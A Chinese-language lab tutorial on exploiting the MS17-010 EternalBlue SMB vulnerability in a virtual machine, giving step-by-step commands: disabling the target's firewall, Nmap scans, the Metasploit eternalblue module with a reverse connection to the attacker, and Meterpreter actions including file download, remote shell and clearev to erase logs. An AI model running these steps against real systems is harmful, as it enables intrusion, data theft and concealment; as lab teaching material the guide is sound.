MS17-010 永恒之蓝漏洞渗透实验|Kali+Windows实操全步骤

MS17-010 永恒之蓝漏洞渗透实验|Kali+Windows实操全步骤 前言本文章仅用于网安技术科普所有实验均在个人虚拟机靶机内操作严禁将技术用于非法入侵他人设备、干扰他人网络正常功能等违法违规行为遵守《中华人民共和国网络安全法》坚守网络安全底线。永恒之蓝MS17-010是Windows系统中经典的SMB协议漏洞利用该漏洞可远程获取目标主机最高权限是网安学习中必掌握的渗透实验之一。本文将拆分实验环境与实验过程先明确环境要求再详细拆解实操步骤从漏洞检测、利用到会话控制一步步实操新手也能轻松上手。一、实验环境要求单独说明不与过程混淆1. 整体环境实验名称MS17-010 永恒之蓝漏洞渗透实验实验工具Nmap端口扫描漏洞检测、Metasploit漏洞利用框架、Meterpreter远程控制会话网络要求VMware虚拟机环境攻击机与靶机需在同一网段确保网络互通2. 攻击机环境Kali Linux系统版本Kali Linux 202x 任意版本推荐2023及以上兼容性更好网络模式NAT模式或桥接模式核心要求与靶机网络互通工具准备nmap自带、msfconsole自带、meterpreterMetasploit内置无需额外安装3. 靶机环境Windows 实验机推荐系统Windows 7、Windows Server 2008 R2默认未安装MS17-010补丁漏洞存在概率最高必备条件未安装MS17-010安全补丁、445端口开放、与攻击机同一局域网、关闭防火墙或放行445、139、3389端口额外配置需开启远程桌面可选用于验证渗透效果、靶机需有用户名登录密码空密码无法远程二、实验过程完整实操步骤按流程排序实验过程分为3个核心阶段靶机前置配置 → 攻击机漏洞检测 → 漏洞利用与会话操作每一步均为实操关键严格按照顺序执行避免操作失误。阶段1靶机前置配置CMD管理员身份执行先完成靶机基础配置确保漏洞可被检测和利用所有命令直接复制执行即可操作步骤执行命令操作目的步骤1查看靶机IPipconfig记录靶机IPv4地址后续攻击机扫描、攻击需用到步骤2关闭防火墙netsh advfirewall set allprofiles state off避免拦截攻击流量实验核心步骤必须执行步骤3开启远程桌面可选reg add HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server /v fDenyTSConnections /t REG_DWORD /d 0 /f开启RDP服务方便后续远程控制靶机验证渗透效果配置完成后可通过ping命令测试与攻击机Kali的连通性靶机CMD输入ping 攻击机IP能ping通则说明网络互通。阶段2攻击机Kali漏洞检测启动Kali按以下步骤执行命令检测靶机是否存在MS17-010漏洞步骤不可逆确保每一步执行成功步骤执行命令操作目的与说明1ip a查看Kali本机IP地址记录下来后续设置攻击机IP需用到2nmap -sV -p445 --scriptsmb-vuln-ms17-010 靶机IP精准检测靶机445端口SMB协议端口判断是否存在MS17-010漏洞扫描高效精准3nmap --script smb-vuln* 靶机IP批量检测靶机所有SMB相关漏洞验证是否存在其他SMB漏洞确保实验环境合规检测结果说明若命令输出中显示“VULNERABLE”则说明靶机存在MS17-010漏洞可继续后续漏洞利用步骤若显示“NOT VULNERABLE”则说明靶机已安装补丁需更换靶机。阶段3攻击机Kali漏洞利用与会话操作漏洞检测确认后使用Metasploit框架利用漏洞获取Meterpreter远程控制会话再执行后续操作步骤如下第一步启动Metasploit框架加载漏洞利用模块步骤执行命令操作说明1msfconsole启动Metasploit渗透测试框架耐心等待加载完成出现msf6 提示符即可2search ms17-010搜索MS17-010相关漏洞利用模块会显示多个可用模块3use 0选择第一个模块默认是exploit/windows/smb/ms17_010_eternalblue最常用的永恒之蓝利用模块第二步设置攻击参数执行漏洞利用步骤执行命令操作说明1set rhosts 靶机IP设置攻击目标IP替换为之前记录的靶机IP确保输入正确2set lhost 攻击机IP(Kali)设置攻击机IP替换为Kali本机IP用于接收靶机的反向连接3run执行漏洞利用耐心等待1-3分钟成功后会进入meterpreter 会话提示符注意若执行run后提示失败检查靶机是否未安装补丁、网络是否互通、IP是否设置正确排查后重新执行即可。第三步Meterpreter会话核心操作进入meterpreter会话后可对靶机进行多种远程操作以下是最常用的核心命令按需执行会话命令功能描述与操作示例ps查看靶机所有正在运行的进程可识别核心进程或可疑进程screenshot截取靶机当前屏幕图片自动保存至Kali /root目录可后续查看run vcn实时监控靶机屏幕可实时查看靶机操作动态退出监控按CtrlCshell获取靶机CMD命令行输入chcp 65001解决中文乱码可直接操作靶机clearev清除靶机系统日志掩盖攻击痕迹实验结束后建议执行getuid查看当前获取的靶机用户权限显示NT AUTHORITY\SYSTEM即为最高权限download 目标文件路径 本地保存路径示例download C:\test.txt /root 将靶机C盘test.txt下载到Kali根目录upload 本地文件路径 目标机保存路径示例upload /root/test.exe C:\ 将Kali根目录test.exe上传到靶机C盘会话退出输入exit即可退出Meterpreter会话关闭与靶机的连接。三、实验注意事项与总结1. 核心注意事项实验仅在个人虚拟机靶机内进行严禁用于外网或他人设备违反法律后果自负靶机必须未安装MS17-010补丁否则漏洞无法利用可通过Windows更新查看补丁安装情况实验过程中确保攻击机与靶机网络互通IP设置正确否则无法获取会话执行命令时严格按照步骤顺序操作避免遗漏参数如set rhosts、set lhost实验结束后及时关闭靶机和攻击机恢复靶机快照避免漏洞被意外利用。2. 实验总结本次实验严格拆分实验环境与实验过程清晰呈现了MS17-010永恒之蓝漏洞的完整渗透流程从靶机前置配置、攻击机漏洞检测到Metasploit漏洞利用、Meterpreter会话控制每一步都围绕实操展开助力掌握核心技能。通过实验可明确永恒之蓝漏洞的利用依赖SMB协议445端口核心危害是“远程无权限获取系统最高权限”同时也能掌握Nmap漏洞检测、Metasploit框架使用、Meterpreter会话操作的核心技巧。日常防护建议使用Windows系统时及时安装系统安全补丁、关闭不必要的端口如445端口、开启防火墙从源头防范此类漏洞攻击。如果有遗漏与错误的地方欢迎大家指出有疑问和不懂的也可以留言讨论谢谢